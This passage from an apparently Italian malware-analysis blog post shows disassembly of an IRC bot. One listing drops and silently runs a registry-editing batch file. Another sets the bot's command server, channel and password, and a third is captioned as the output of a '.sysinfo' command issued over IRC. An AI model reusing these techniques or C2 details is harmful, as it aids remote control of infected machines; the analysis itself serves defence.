…ABC0:00401A78 push esiABC0:00401A79 push ediABC0:00401A7A mov ecx, 5C1hABC0:00401A7F mov esi, offset a@echoOffEchoRe ; “@echo off\r\nEcho REGEDIT4″…ABC0:00401A84 lea edi, [ebp+Buffer]ABC0:00401A8A lea eax, [ebp+CommandLine]ABC0:00401A90 rep movsdABC0:00401A92 movswABC0:00401A94 push offset aCA_bat ; “c:\\a.bat”ABC0:00401A99 push eax ; char *ABC0:00401A9A movsbABC0:00401A9B call _sprintf…ABC0:00401AD4 push eax ; nNumberOfBytesToWriteABC0:00401AD5 lea eax, [ebp+Buffer]ABC0:00401ADB push eax ; lpBufferABC0:00401ADC push edi ; hFileABC0:00401ADD call WriteFile…ABC0:00401B07 push ecx ; lpStartupInfoABC0:00401B08 push esi ; lpCurrentDirectoryABC0:00401B09 inc eaxABC0:00401B0A push esi ; lpEnvironmentABC0:00401B0B push 28h ; dwCreationFlagsABC0:00401B0D mov [ebp+StartupInfo.dwFlags], eaxABC0:00401B10 push eax ; bInheritHandlesABC0:00401B11 push esi ; lpThreadAttributesABC0:00401B12 lea eax, [ebp+CommandLine]ABC0:00401B18 push esi ; lpProcessAttributesABC0:00401B19 push eax ; lpCommandLineABC0:00401B1A push esi ; lpApplicationNameABC0:00401B1B mov [ebp+StartupInfo.wShowWindow], siABC0:00401B1F call CreateProcessA
Codice 2 – La sezione che si occupa della connessione a Irc.
ABC0:00403B5B push 7Fh ; size_tABC0:00403B5D push offset aTestirc1_sh1xy ; “testirc1.sh1xy2bg.NET”ABC0:00403B62 push offset byte_47554C ; char *ABC0:00403B67 call _strncpyABC0:00403B6C mov eax, dword_41C7B8ABC0:00403B71 push 3Fh ; size_tABC0:00403B73 push offset aChalenge ; “#chalenge”ABC0:00403B78 push offset byte_4755CC ; char *ABC0:00403B7D mov ds:dword_47569C, eaxABC0:00403B82 call _strncpyABC0:00403B87 add esp, 40hABC0:00403B8A push 3Fh ; size_tABC0:00403B8C push offset aHappy12 ; “happy12″ABC0:00403B91 push offset byte_47560C ; char *ABC0:00403B96 call _strncpy
Codice 3 – L’output del comando .sysinfo impartito via chat Irc.
<@anthony> .sysinfo
Post
Nessun commento:
Posta un commento